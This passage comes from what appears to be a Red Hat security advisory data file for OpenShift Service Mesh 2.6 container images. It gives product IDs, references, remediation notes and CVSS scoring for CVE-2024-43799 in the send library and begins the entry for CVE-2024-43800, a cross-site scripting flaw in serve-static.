"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", 